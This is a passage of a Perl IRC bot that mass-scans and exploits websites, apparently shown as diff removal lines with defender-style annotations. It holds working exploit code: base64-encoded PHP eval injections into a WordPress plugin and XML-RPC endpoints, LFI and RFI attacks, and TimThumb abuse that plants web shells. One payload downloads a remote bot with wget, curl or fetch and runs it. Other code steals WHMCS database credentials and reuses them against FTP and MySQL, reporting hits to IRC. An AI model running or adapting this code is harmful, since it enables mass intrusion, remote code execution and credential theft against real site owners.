QmJLVXYrKzAyVE1RQnJYSHZveUpveXJmV09FRHNsbkpRVk9pd2ZnNW9TZk51eHoybmo3dDBYYzNmMmZISUQrZnBJNkVWZm1nSEV5SnptdUUwUDZCdmNyaVkwR1BxV25yd3R0WHVSc0xOSlR3QzRYY3FXSlhwYk1wNXA5MFpTZ3hqNWE4cFJoZThOM2t2TzEzOGFoNURIT0t2UDdBZkFkck96VU9kbXVsTUVCbVJCc2xYWmV3b3ZINEE3U1M4ZGE1Vm83Mk0xL3REQXVzeUpCeVFYUG1IYWpnK2dYM2N4c21qSkVTcXQ1N1Z1QUtmQjROODRtL3FSb3pnODIycXRJWExPRmJoK1R6U0kyNHFPYWxuMzBlSjFVc0FVK1E1SnhzVVcranJjSXRzamFWQ2R0cGExNmExamVqUldMaXQwNmx0d3MyY293Ulk3YnZsemZnYjJXcWFQaDFPVUE2Y2s0ekVYR0xSemVPbzBremozZ0RNak1ibDQ4c3NoVGRIYUVBUGViRkoyWGthWEI1bDFJNDVrMGFERS9KQlJwZVBkVk14WHdsbkVwN29WMGJ4Y3kyZktIU0pMQXYwQlJnOG43T2h3c3IrTWVvU2ZrMmR5MkZ5TFhVTitvREdyRVZVazc4OVM4dVlEVnJLU0lmZUZYSzJ1ekxKVnp1Yk5FWWJlVWVXWUw0clRFa3NWcFJUQXlXWnp5anc0UDN4Rk1MUERwbmNIYlF5NG1ZcS9wbllhL0diUFQ1TER0ZkR6OUZ3PT0iKSkpOwokZmljaGllciA9IGZvcGVuK
CcuL2xvYmV4LnBocCcsJ3cnKTsKZndyaXRlKCRmaWNoaWVyLCAkYyk7CmZjbG9zZSgkZmljaGllcik7Cg";
- my $ihcek = "JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwoKZWNobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK";
- my $vuln = "http://".$site.$bug."?action=log-reset&type=ih_options();eval(base64_decode(".$ihxxx."));error";
- my $cekih = "http://".$site.$bug."?action=log-reset&type=ih_options();eval(base64_decode(".$ihcek."));error";
- my $shell = "http://".$site."wp-content/plugins/is-human/lobex.php";
- my $coba = &get_content($cekih);
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if ($coba =~ /Array<br>(.*?)<br>(.*?)gid=/){ my $uname = $1; my $uid = $2; &get_content($vuln);sleep(1);
- &msg("$chan","$ihlogo $engine Exploiting http://$site ");
- my $res = &get_content($shell);sleep(1);
- if ($res =~ /UnKnown - Simple Shell/){
- &msg("$chan","$ihlogo $engine <=> SheLL <=> $shell ");
- } else { &msg("$chan","$ihlogo $engine <=> Vuln <=> $site <=> Os=$uname $uid ");
- }
- }
- } exit;
- }
- }
- }
- }
- # rfi_exploit($chan, $bug, $simpan, $dork, $engine) -- analyst annotation, code unchanged.
- # Builds three URLs per host by appending "test??", $injector."??" and $botshell."??" to
- # http://<site><bug>. The "test??" probe is fetched first; a reply containing PHP's
- # "failed to open stream" warning is taken as the sign that the parameter reaches an include.
- # Defender view: look for request parameters whose value is an external URL ending in
- # "??", and for PHP include warnings leaking into responses. Disabling allow_url_include
- # and hiding PHP errors from clients removes both the flaw and the signal this check uses.
- # $injector and $botshell are defined outside this excerpt; $simpan is not used here.
- sub rfi_exploit() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- if ($count == $num-1) { &msg("$chan","$rfilogo $engine Finished for $dork "); }
- my $coba = "http://".$site.$bug."test??";
- my $test = "http://".$site.$bug.$injector."??";
- my $dor = "http://".$site.$bug.$botshell."??";
- my $cek = &get_content($coba);
- # Double fork so the per-site work runs in a detached grandchild process.
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- # The $botshell URL is requested for every host, before the probe result is examined.
- &get_content($dor);sleep(1);
- if ($cek =~ /failed to open stream/) {
- my $check = &get_content($test);sleep(1);
- if ($check =~ /stunshell/i) {
- # os2() is defined outside this excerpt; presumably it reports the result -- confirm.
- &os2($test,$chan,$engine,$rfilogo);
- }
- }
- } exit;
- }
- }
- }
- }
- # lfi_exploit($chan, $bug, $simpan, $dork, $engine) -- analyst annotation, code unchanged.
- # Appends a long "../" chain plus /proc/self/environ%0000 to http://<site><bug> and treats a
- # reply containing both "DOCUMENT_ROOT=/" and "HTTP_USER_AGENT" as proof that the process
- # environment is being included. It then calls lfi_env_query() on the same URL and reads
- # the OS and user strings back from between the c0li# ... #c0li ... SUCCESS markers.
- # Defender view: directory-traversal sequences ending in /proc/self/environ with an
- # encoded null byte, User-Agent headers containing PHP tags, and a file named /tmp/lobex
- # are the traces to search for. $simpan is accepted but not used here.
- sub lfi_exploit() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- if ($count == $num-1) { &msg("$chan","$lfilogo $engine Finished for $dork "); }
- my $dir = "../../../../../../../../../../../../../../../../../../../../../../../../";
- my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
- my $shell = "http://".$site.$bug.$dir."/tmp/lobex%0000";
- my $html = &get_content($test);
- # Double fork so the per-site work runs in a detached grandchild process.
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) {
- my $res = lfi_env_query($test);
- # &lfi_spread_query($test);
- if ($res =~ /c0li#(.*?)#c0li(.*?)SUCCESS/) {
- my $os = $1;
- my $uid = $2;
- # The same traversal is reused to request /tmp/lobex and look for the shell banner.
- my $lficheck = &get_content($shell);
- if ($lficheck =~ /UnKnown - Simple Shell/){
- &msg("$chan","$lfilogo $engine <=> SheLL <=> $shell (OS=$os) $uid ");
- } else {
- &msg("$chan","$lfilogo $engine <=> Vuln <=> $site (OS=$os) $uid ");
- }
- }
- }
- } exit; }
- }
- }
- }
- sub lfi_env_query() {
- my $url = $_[0];
- my $code = 'JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWxkUXVOVEZIMHVFdjl1bUZPeW93V0hla2gyQldScEtURWxkeUUwUWZvQ3lHWHNWaktMUGJaenhuRkd4SC92dlROcFZaYUYwbmZ6RXVmZVpyL09uTGxCOTNDNUtHcHFGRWFLRnlKRk9wYmFlaC92N2pBcEN4bFdTUlpGWmpGcUQ5SElkTVRkNDFjeDdiYWlNQWpEd2ZEeTJwbkduK003NTdiZC91RnVhcWRvenhYWFZrUUpXbnhsQ0U2dEpadkNJd2FNL2dwVDEvUjhQTDZLem9maG1ONmltNHZQVys1RThPY2tDTWZSY1RTd2dIYVJyZ0JPNHpRbXEwdk1DVkd3VVpNYmdha3huaUpaeFRPV0g2WU1vSis0NE5FY3VtZlFHT1ZTeXB4by8zaGdtenkwRkZncXlmVUswb2NuZEU1bk1ld0hrR0JyYVZPUEg0R0ZXYkZLUTVjQU1xV1pMSm4wb2VLaVEyMjZFbVRPM1BWUmp2Mk9RZnI5RWRCSHo4enVaeUVoeVZoT28rQnZPQTQyZ3ZLWWRDNjFzOE9oeEJJaVA4M1I2aVZTUWZjSk5WblJmVzBlSzU2UlgvRkxiMDRXVFpkVW5VSERGYkRXakdZakJrb2tjZktlYmlQMUZEZUNnR2hEbHdGbTB5czFuVDg3OXZxVW44aHRobXYzenJERWRHRWpuZCtDOGJXVGNZVmdLQnRIalNvcW1iQmFIVGpoNlhWak5ZN09CbjhFbHljWGdYQzBrREtsT2ZHZlEvM2g2ZVFpdUJ4VW8rRmo3Tnh0dExNc0Q3aFZzZ3FnK0t4clhuUE1BNW1qVnlTek5OdHQrOFFtZWRzQnZxT0VqdDRrb1NNcklRQWxpNExRcnVZNmNMMkorRjBVV0U0T1ZYVnRKK0dDY2t5M2NMMDRVZzJmRldQSkZQK2IrVCtScE1qZ3RINzhZRDY5N3JSVXZXaGFqMms3UnJCV0U5d0NjRWZCYnZ2VXBSNk1HSUVCYTlIRzZMWTkybjU0alFrRXdCQVZRbjJUS1YvQkkzRkxsL0FvbVQ4NTUxODdOOXR0UmowOFBDaFY4VGlqeWh4eWV6dk5yQktKaGtoVHlpVVVJNml0Y1puYWU1YWd5U3F4U1BsWFdFd1d5bEwvdnROa2pCQ05lQTk5R1JQRzFUNXJqdzdKWnlVRlRvc0g0T1p4SHpic1UrVzEvVnNsWVdIK1dBMUF2MXlrTG9TVU9VQ1p6RmFPZUFTWXZzSzlWMi9EZ1VKMjcyaFBRb3M4ajFMYUVOamxvcXcwMGF1UytVZXpMNW9TNU5pblZwN1NlbUpMV21iKzVMZHNLTG1QczhyOHZnTjhCenZyT2NmYm5USTRJSk1pcnpMTldHdmhHTnhPR3V1NDZid1pCNmY1bHhFbWNrbkVLVG5qR1ROd1p4RDllWm9GUWtZbTZtR1Y3WDBMTUlQNDJvM2F4SiswcnZuQmMzdTFpMWkyTk5GVWNiT0pqZnpJcG8xKy8xaGRWTEFsUGtPU2NiRkZ2bzYzQW5tVHRZOUI5WnBiTy9BV3ZSdXJGUm03YVhsanMxd3JFNUZsM1BMbDB4M1llSmsrbXBpNkhRaHRNQTZ6akdUN2h0ZEJVSWxtQ3pnRE1qck1pM3NXMmV3c2pSRGdmak5SNTNKeHcyRGpycnZ4V1ptNm1lK1NDcWUxZTZSRUJid2RUSXA3NFpIWVVsbTIvRzZWSlBEWGgzVXdiRituZytWbzFDZjBtRHlhMi9hTTVFMzBEY3RqVkF4eXRUTkN6UnVyWG5pbGNac0srcmxFMEtINXdMSkp1T01qOW9VbExuTXlXODJLcUlPeFovTVZXUDVVUlNkRzVDQ0xuUmNTZit6OUF3PT0iKSkpOwokZmljaGllciA9IGZvcGVuKCcvdG1wL2xvYmV4JywndycpOwpmd3JpdG
UoJGZpY2hpZXIsICRjKTsKZmNsb3NlKCRmaWNoaWVyKTsK';
- my $ua = LWP::UserAgent->new(agent => "<?echo 'c0li#'.php_uname().'#c0li'.get_current_user();eval(base64_decode('".$code."'));echo 'SUCCESS';?>");
- $ua->timeout(7);
- my $req = HTTP::Request->new(GET => $url);
- my $res = $ua->request($req);
- return $res->content;
- }
- # xml_exploit($chan, $bug, $simpan, $dork, $engine) -- analyst annotation, code unchanged.
- # Fetches http://<site><bug> for each host and treats a reply containing "faultcode"
- # (case-insensitive) as an XML-RPC endpoint. It then calls xml_cek_query2() and looks for
- # text between the markers "Byroe" and "Lobex" in the reply, and finally requests
- # /lobex.php at the site root, looking for the banner "UnKnown - Simple Shell".
- # Defender view: text/xml POSTs whose <name> value contains PHP statements, and a
- # lobex.php in the web root, are the traces to search for.
- # $simpan is accepted but not used here.
- sub xml_exploit() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- if ($count == $num-1) { &msg("$chan","$xmllogo $engine Finished for $dork "); }
- my $test = "http://".$site.$bug;
- # $vuln is referenced only by the commented-out report further down.
- my $vuln = "http://".$site." 12".$bug;
- my $html = &get_content($test);
- # Double fork so the per-site work runs in a detached grandchild process.
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if ($html =~ /faultcode/i ) {
- my $resp = &xml_cek_query2($test);
- if ($resp =~ /Byroe(.*)Lobex/s) {
- # &xml_spread_query($test);sleep(1);
- my $sys = $1;
- my $shell = "http://".$site."/lobex.php";
- my $check = &get_content($shell);
- if ($check =~ /UnKnown - Simple Shell/) {
- my $safe = ""; my $os = ""; my $uid = "";
- if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
- if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
- if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
- &msg("$chan","$xmllogo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$admin","$xmllogo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
- }
- # else {
- # &msg("$chan"," 0,1$xmllogo( 4@ 8$engine 15) 15( 13@ 12SysTem 15) 10 ".$vuln." 3".$sys); sleep(1);}
- }
- }
- } exit;
- }
- }
- }
- }
- # xml_cek_query($url) -- analyst annotation, code unchanged.
- # POSTs a text/xml methodCall to $url (7 second timeout, User-Agent "perl post") and
- # returns the response body. The <name> value starts with the sequence ',''));
- # followed by PHP that runs "uname -a" between two j13mb0t marker strings.
- # Detection: XML-RPC request bodies containing that quote sequence or PHP statements,
- # and the fixed User-Agent string. No call to this sub appears in this part of the file.
- sub xml_cek_query() {
- my $url = $_[0];
- my $code = "system('uname -a');";
- my $ua = LWP::UserAgent->new(agent => 'perl post');
- # $exploit is not declared with "my", so it is a package variable shared with the other xml_* subs.
- $exploit = "<?xml version=\"1.0\"?><methodCall>";
- $exploit .= "<methodName>test.method</methodName>";
- $exploit .= "<params><param><value><name>',''));";
- $exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*</name></value></param></params></methodCall>";
- $ua->timeout(7);
- my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
- return $res->content;
- }
- sub xml_cek_query2() {
- my $url = $_[0];
- my $string = "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";
- my $ua = LWP::UserAgent->new(agent => 'perl post');
- $exploit = "<?xml version=\"1.0\"?><methodCall>";
- $exploit .= "<methodName>test.method</methodName>";
- $exploit .= "<params><param><value><name>',''));";
- $exploit .= "echo 'Byroe';echo(php_uname());eval(base64_decode('$string'));echo 'Lobex';exit;/*</name></value></param></params></methodCall>";
- $ua->timeout(7);
- my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
- return $res->content;
- }
- # xml_spread_query($xmltargt) -- analyst annotation, code unchanged.
- # Same XML-RPC request shape as the other xml_* subs, but the embedded PHP is one
- # system() call that downloads $injector and $botshell with wget, fetch, curl -O and
- # lwp-download, saves them as lobex.php and tmp.php, kills all perl and php processes,
- # and runs "php bot.txt" from /tmp and /var/tmp, deleting the file after each run.
- # Host-side detection: the web-server account spawning wget/fetch/curl/lwp-download and
- # then php from /tmp or /var/tmp, "killall -9 perl" / "killall -9 php" in process
- # accounting, and files named lobex.php, tmp.php or bot.txt.
- # The only call site in this part of the file is commented out. The response is not returned.
- sub xml_spread_query() {
- my $xmltargt = $_[0];
- my $xmlsprd = "system('wget ".$injector." -O lobex.php;fetch ".$injector.";mv bad.txt lobex.php;wget ".$botshell." -O tmp.php;fetch ".$botshell.";mv bot.txt tmp.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bot.txt;rm -rf bot.txt;wget ".$botshell.";php bot.txt;rm -rf bot.txt;curl -O ".$botshell.";php bot.txt;rm -rf bot.txt;lwp-download ".$botshell.";php bot.txt;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bot.txt;rm -rf bot.txt;wget ".$botshell.";php bot.txt;rm -rf bot.txt;curl -O ".$botshell.";php bot.txt;rm -rf bot.txt;lwp-download ".$botshell.";php bot.txt;');";
- my $userAgent = LWP::UserAgent->new(agent => 'perl post');
- $exploit = "<?xml version=\"1.0\"?><methodCall>";
- $exploit .= "<methodName>test.method</methodName>";
- $exploit .= "<params><param><value><name>',''));";
- $exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*</name></value></param></params></methodCall>";
- $userAgent->timeout(7);
- my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
- }
- # thumb_exploit($chan, $bug, $simpan, $dork, $engine) -- analyst annotation, code unchanged.
- # Requests http://<site><bug>?src=<remote URL> for each host (the logo string at the top of
- # the file labels this module "TimThumb"). An "Unable to open image" error that echoes the
- # cache path and $md5php is used to work out where the fetched file was stored; that
- # cached file is then requested with ?clone and checked for the string "stunshell".
- # Defender view: src= parameters pointing at look-alike hosts (the file's configuration
- # uses a host of the form flickr.com.<other-domain>), .php files inside the thumbnail
- # cache directory, and an unexpected wp-includes/wp-script.php are the traces to check.
- # $thumbshell, $botid, $botxid, $md5php, $md5bot and $md5botx are defined outside this
- # excerpt; $simpan is accepted but not used here.
- sub thumb_exploit() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- my $vuln = "http://".$site.$bug."?src=".$thumbshell;
- my $botis = "http://".$site.$bug."?src=".$botid;
- my $botxc = "http://".$site.$bug."?src=".$botxid;
- # $nbug[0] is the first path segment of $bug and is used as the base directory below.
- my @nbug = split(/\//,$bug);
- my $cek = &get_content($vuln);
- # Double fork so the per-site work runs in a detached grandchild; $pid is not lexical here.
- if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else {
- if ($cek =~ /Unable to open image(.*?)$nbug[0](.*?)$md5php/i){
- &msg("$chan","$thumblogo $engine Exploiting http://$site ");
- my $pdir = $2;
- # With $spreadMode set to 1 the two additional src= URLs are requested as well.
- if ($spreadMode == 1) { &get_content($botis); &get_content($botxc);sleep(1); }
- my $crut = "http://".$site.$nbug[0].$pdir.$md5php;
- my $botc = "http://".$site.$nbug[0].$pdir.$md5bot;
- my $botpc = "http://".$site.$nbug[0].$pdir.$md5botx;
- my $npath = "http://".$site."wp-includes/wp-script.php";
- my $check = &get_content($crut."?clone");sleep(1);
- if ($check =~ /stunshell/i){
- my $safe = ""; my $os = ""; my $uid = "";
- if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
- if ($check =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
- if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
- # Whichever location answers with the banner (wp-script.php first, else the cache file) is reported.
- my $crot = &get_content($npath);sleep(1);
- if ($crot =~ /stunshell/i){
- &msg("$admin","$thumblogo $engine <=> sHeLL <=> ".$npath." (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$chanxxx","$thumblogo $engine <=> sHeLL <=> ".$npath." (SafeMode=$safe) (OS=$os) uid=$uid ");
- } else {
- &msg("$admin","$thumblogo $engine <=> sHeLL <=> ".$crut." (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$chan","$thumblogo $engine <=> sHeLL <=> ".$crut." (SafeMode=$safe) (OS=$os) uid=$uid ");
- }
- &get_content($botc);sleep(1);
- &get_content($botpc);sleep(1);
- }
- }
- } exit; }
- if ($count == $num-1) { &msg("$chan","$thumblogo $engine Finished for $dork "); }
- }
- }
- }
- # whmcs_exploit($chan, $bug, $simpan, $dork, $engine) -- analyst annotation, code unchanged.
- # Appends "../../../configuration.php%00" to http://<site><bug> and treats a reply
- # containing "db_host" as a disclosed configuration file. The database user, password and
- # name are parsed out with getUserPass() and getinfo(), posted to $chaninfo, and tried
- # against the host's FTP and MySQL services. It then fetches the $subticket page and
- # probes /downloads/indexx.php and /templates_c/indexx.php for a multipart upload form.
- # Defender view: traversal plus encoded null byte aimed at configuration.php, files named
- # indexx.php under downloads/ or templates_c/, and FTP/MySQL logins from unfamiliar
- # addresses shortly after such a request. Rotate every credential in the disclosed file.
- # $subticket is defined outside this excerpt; $simpan is accepted but not used here.
- sub whmcs_exploit() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bug,$dork,$engine,$whmcslogo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- if ($count == $num-1) { &msg("$chan","$whmcslogo $engine Finished for $dork "); }
- my $test1 = "http://".$site.$bug."../../../configuration.php%00";
- my $submit = "http://".$site.$subticket;
- my $html = &get_content($test1);
- # Double fork so the per-site work runs in a detached grandchild; $pid is not lexical here.
- if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else {
- if ($html =~ /db_host/i) {
- my $userpass = &getUserPass($html); sleep(2);
- my $info = &getinfo($html); sleep(2);
- # $info still contains the ":Viva-Byroe.Net:" separators when it is posted to the channel.
- &msg("$chaninfo","$whmcslogo $engine <=> info [http://".$site."] $info");
- my $lulz = "http://".$site;
- my $user = ""; my $pass = ""; my $user2 = ""; my $pass2 = ""; my $dtbs2 = "";
- if($lulz =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) {
- my $host = $2;
- my @ftpu = split(":Viva-Byroe.Net:", $userpass);
- my @dbic = split(":Viva-Byroe.Net:", $info);
- $user = $ftpu[0]; $pass = $ftpu[1];
- $user2 = $dbic[0]; $pass2 = $dbic[1]; $dtbs2 = $dbic[2];
- my $ftpstat = "";
- # For FTP the user name is cut at the first underscore; the MySQL attempt uses it in full.
- if($user =~ /_/) { @userz = split("_", $user); $user = $userz[0];}
- &ftp_connect($test1,$host,$user,$pass,$chan,$engine,$whmcslogo);sleep(1);
- &dbi_connect($host,$user2,$pass2,$dtbs2,$chan,$engine,$whmcslogo);sleep(1);
- }
- my $ceksubmit = &get_content($submit);
- if ($ceksubmit =~ /Urgency/i) {
- &msg("$submitchan","$whmcslogo $engine <=> Submit Ticket [".$submit."]"); sleep(2);
- my $uploader = "http://".$site."/downloads/indexx.php";
- my $uploader2 = "http://".$site."/templates_c/indexx.php";
- my $cekup = &get_content($uploader);
- my $cekup2 = &get_content($uploader2);
- if ($cekup =~ /enctype=\"multipart\/form-data"/i) { &msg("$chanxxx","$whmcslogo $engine <=> Uploader [".$uploader."]");&msg("$admin","$whmcslogo $engine <=> Uploader [".$uploader."]"); }
- if ($cekup2 =~ /enctype=\"multipart\/form-data"/i) { &msg("$chanxxx","$whmcslogo $engine <=> Uploader [".$uploader2."]");&msg("$chanxxx","$whmcslogo $engine <=> Uploader [".$uploader2."]"); }
- }
- }
- } exit;
- }
- }
- }
- }
- # ftp_connect($url, $host, $user, $pass, $chan, $engine, $logo) -- analyst annotation, code unchanged.
- # Opens an FTP session to $host (7 second timeout) and tries $user/$pass. On a successful
- # login it posts the host and the credentials in clear text to $chanxxx.
- # $url and $chan are accepted but not used. Note the inverted flag: $success starts at 1
- # and is set to 0 when the login works.
- # Defender view: this is credential reuse -- passwords taken from a web application's
- # config file tried against the same host's FTP service. Distinct FTP credentials and
- # alerting on FTP logins from new source addresses limit the impact.
- sub ftp_connect {
- my $url = $_[0];
- my $host = $_[1];
- my $user = $_[2];
- my $pass = $_[3];
- my $chan = $_[4];
- my $engine = $_[5];
- my $logo = $_[6];
- my $success = 1;
- # "use" is processed at compile time, so Net::FTP is loaded when the file is compiled.
- use Net::FTP;
- my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 7);
- $success = 0 if $ftp->login($user,$pass);
- $ftp->quit;
- if ($success == 0) {
- &msg("$chanxxx","$logo $engine <=> FTP [http://".$host."] [".$user.":".$pass."]");
- }
- }
- # dbi_connect($host, $user, $pass, $dtbs, $chan, $engine, $logo) -- analyst annotation, code unchanged.
- # Builds the DSN dbi:mysql:<database>:<host>:3306 and attempts a DBI connection with the
- # supplied credentials. When the connection handle is true it posts "[Connected]" for the
- # host to $chanxxx; $chan is accepted but not used.
- # Defender view: the attempt can only succeed where MySQL accepts remote connections on
- # port 3306. Binding the database to localhost or firewalling the port, and restricting
- # accounts to local hosts, removes this follow-on step.
- sub dbi_connect () {
- my $host = $_[0];
- my $user = $_[1];
- my $pass = $_[2];
- my $dtbs = $_[3];
- my $chan = $_[4];
- my $engine = $_[5];
- my $logo = $_[6];
- my $port = "3306";
- my $platform = "mysql";
- my $dsn = "dbi:$platform:$dtbs:$host:$port";
- my $DBIconnect= DBI->connect($dsn,$user,$pass);
- if ($DBIconnect) {
- &msg("$chanxxx","$logo $engine <=> MySql [http://".$host."] [Connected]");
- }
- }
- # getUserPass($string) -- analyst annotation, code unchanged.
- # Splits the given text on CRLF and scans each line for db_username and db_password
- # assignments whose value is in single or double quotes and ends with a semicolon.
- # Returns "<user>:Viva-Byroe.Net:<pass>"; a part stays empty when no line matched, and a
- # later matching line overwrites an earlier one.
- # The fixed separator string is itself a usable indicator in captured IRC traffic.
- sub getUserPass() {
- my $string = $_[0];
- my @lol = split("\r\n", $string);
- my $pass = "";
- my $user = "";
- foreach my $line (@lol) {
- # The third capture group is the quoted value.
- if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) {
- $pass = $3;
- }
- if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) {
- $user = $3;
- }
- }
- return $user.":Viva-Byroe.Net:".$pass;
- }
- # getinfo($string) -- analyst annotation, code unchanged.
- # Same line-by-line scan as getUserPass(), with db_name extracted as well.
- # Returns "<user>:Viva-Byroe.Net:<pass>:Viva-Byroe.Net:<database>"; a part stays empty
- # when no line matched.
- sub getinfo() {
- my $string = $_[0];
- my @lol = split("\r\n", $string);
- my $pass = "";
- my $user = "";
- my $dbs = "";
- foreach my $line (@lol) {
- # The third capture group is the quoted value.
- if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) {
- $pass = $3;
- }
- if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) {
- $user = $3;
- }
- if(($line =~ m/db_name(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_name(.*?)=(.*?)"(.+?)";/i)) {
- $dbs = $3;
- }
- }
- return $user.":Viva-Byroe.Net:".$pass.":Viva-Byroe.Net:".$dbs;
- }
- # zero_exploit($chan, $bug, $simpan, $dork, $engine) -- analyst annotation, code unchanged.
- # Fetches http://<site><bug> for each host; when the reply contains "Zeroboard" it runs a
- # local helper program (./zbc <url> 80) and then requests a series of URLs built from
- # $action, finally checking /data/kekkaishi.php for the string "stunshell".
- # Defender view: on a targeted board, look for data/kekkaishi.php and for requests to the
- # $action path carrying a cmd= parameter; on a host running this bot, the zbc binary
- # sits in the bot's working directory.
- # $action, $wgetdon, $lwpdon and $curldon are defined outside this excerpt; $simpan is
- # accepted but not used here.
- sub zero_exploit() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zerologo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- if ($count == $num-1) { &msg("$chan","$zerologo $engine Finished for $dork "); }
- my $coba = "http://".$site.$bug;
- my $cek = &get_content($coba);sleep(1);
- # Double fork so the per-site work runs in a detached grandchild; $pid is not lexical here.
- if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else {
- if ($cek =~ /Zeroboard/) { system("./zbc $coba 80");sleep(1);
- my $vulner1 = "http://".$site.$action."?cmd=";
- my $vulner2 = "http://".$site.$action.$wgetdon;
- my $vulner3 = "http://".$site.$action.$lwpdon;
- my $vulner4 = "http://".$site.$action.$curldon;
- my $vuln1 = "http://".$site."/data/kekkaishi.php";
- my $check2 = &get_content($vulner1);
- # "Byroe Team" in the reply is the marker that gates the follow-up requests.
- if ($check2 =~ /Byroe Team/) {
- # The three flags are set to 1 at the top of the file, so all three variants are requested.
- if ($zerowget == 1) { my $coba1 = &get_content($vulner2);sleep(2); }
- if ($zerolwp == 1 ) { my $coba2 = &get_content($vulner3);sleep(2); }
- if ($zerocurl == 1) { my $coba3 = &get_content($vulner4);sleep(2); }
- my $check1 = &get_content($vuln1);
- if ($check1 =~ /stunshell/i) {
- my $safe = ""; my $os = ""; my $uid = "";
- if ($check1 =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
- if ($check1 =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
- if ($check1 =~ m/uid=(.*?)gid=/) {$uid = $1;}
- &msg("$admin","$zerologo $engine <=> sHeLL <=> ".$vuln1." (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$chan","$zerologo $engine <=> sHeLL <=> ".$vuln1." (SafeMode=$safe) (OS=$os) uid=$uid ");
- } else {
- &msg("$chan","$zerologo $engine <=> Cek dewe $vulner1 ");
- } sleep(2);
- }
- }
- } exit; }
- }
- }
- }
- ##################################################################################
- sub search_engine() { # Runs the dork in $_[2] against the backend named in $_[3] and returns the de-duplicated result list.
- my (@total,@clean);
- my $chan = $_[0]; # IRC target for the optional result-count message
- my $bug = $_[1]; # assigned here but not read again in this sub
- my $dork = $_[2]; # search string passed to the selected backend
- my $engine = $_[3]; # backend selector, matched with case-sensitive eq below
- my $logo = $_[4]; # prefix text for the status message
- if ($gps == 1) { # $gps is 1 at the top of the file, so the per-TLD backends are enabled
- if ($engine eq "JacKAE") { my @jackae = &jack1($dork."+site:ae"); push(@total,@jackae); } # every JacK* branch appends "+site:<tld>" and uses one of jack1..jack5
- if ($engine eq "JacKAR") { my @jackar = &jack2($dork."+site:ar"); push(@total,@jackar); }
